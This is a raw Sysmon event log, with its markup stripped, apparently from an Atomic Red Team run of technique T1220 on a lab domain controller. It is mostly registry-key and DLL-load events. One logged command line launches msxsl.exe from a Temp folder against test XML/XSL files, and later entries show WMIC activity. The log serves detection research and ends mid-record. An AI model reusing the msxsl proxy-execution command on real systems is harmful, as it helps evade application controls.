12241200x800000000000000057348277Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348276Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348275Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348274Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057348273Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.142{8B6011A9-5BAB-618E-56F3-04000000F101}1984C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2trueMicrosoft WindowsValid 12241200x800000000000000057348272Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348271Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348270Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348269Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348268Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348267Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348266Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348265Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348264Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348263Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348262Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348261Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348260Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348259Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348258Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 10341000x800000000000000057348257Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.157{8B6011A9-886D-6164-1400-00000000F101}10681424C:\Windows\system32\svchost.exe{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x800000000000000057348256Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.142{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348255Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.142{8B6011A9-5BAB-618E-56F3-04000000F101}1984C:\Windows\System32\cmd.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 10341000x800000000000000057348254Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.142{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5BAB-618E-56F3-04000000F101}1984C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057348253Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.142{8B6011A9-5BAB-618E-56F3-04000000F101}1984C:\Windows\System32\cmd.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057348252Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.142{8B6011A9-5BAB-618E-56F3-04000000F101}1984C:\Windows\System32\cmd.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 12241200x800000000000000057348251Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.142{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348250Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.142{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 10341000x800000000000000057348249Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.142{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BAB-618E-56F3-04000000F101}1984C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|UNKNOWN(00007FFCBCEFB383) 734700x800000000000000057348248Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.142{8B6011A9-5BAB-618E-56F3-04000000F101}1984C:\Windows\System32\cmd.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 10341000x800000000000000057348247Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.142{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-5BAB-618E-56F3-04000000F101}1984C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057348246Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.142{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BAB-618E-56F3-04000000F101}1984C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257223a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25720a1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25fb1d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+256a327(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303aba9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64)|UNKNOWN(00007FFCBCFB2118) 154100x800000000000000057348245Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.092{8B6011A9-5BAB-618E-56F3-04000000F101}1984C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000057348244Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.085{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-11-12 12:18:51.085 11241100x800000000000000057348243Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.085{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-11-12 12:18:51.085 12241200x800000000000000057350091Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057350090Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057350089Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057350088Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057350087Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057350086Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350085Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057350084Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057350083Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350082Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350081Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057350080Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057350079Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.943{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\ncryptsslp.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft SChannel ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationncryptsslp.dllMD5=80D0046E61E3DBD708B53657DA4C5821,SHA256=7457E1BB911D132A8BEDEB6D7DEDB82365A6D681FBEF2331D4FB545AC1DA5A56trueMicrosoft WindowsValid 12241200x800000000000000057350078Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350077Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350076Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350075Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057350074Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057350073Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350072Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350071Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057350070Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057350069Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350068Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350067Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.943{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 11241100x800000000000000057350066Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.927{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeC:\Users\Administrator\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB2021-11-12 12:18:52.927 11241100x800000000000000057350065Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.927{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exeC:\Users\Administrator\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB2021-11-12 12:18:52.927 12241200x800000000000000057350064Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057350063Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057350062Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057350061Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057350060Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057350059Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350058Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057350057Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057350056Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350055Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057350054Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057350053Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057350052Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057350051Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.874{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057350050Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.858{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\webio.dll10.0.14393.3866 (rs1_release.200805-1327)Web Transfer Protocols APIMicrosoft® Windows® Operating SystemMicrosoft 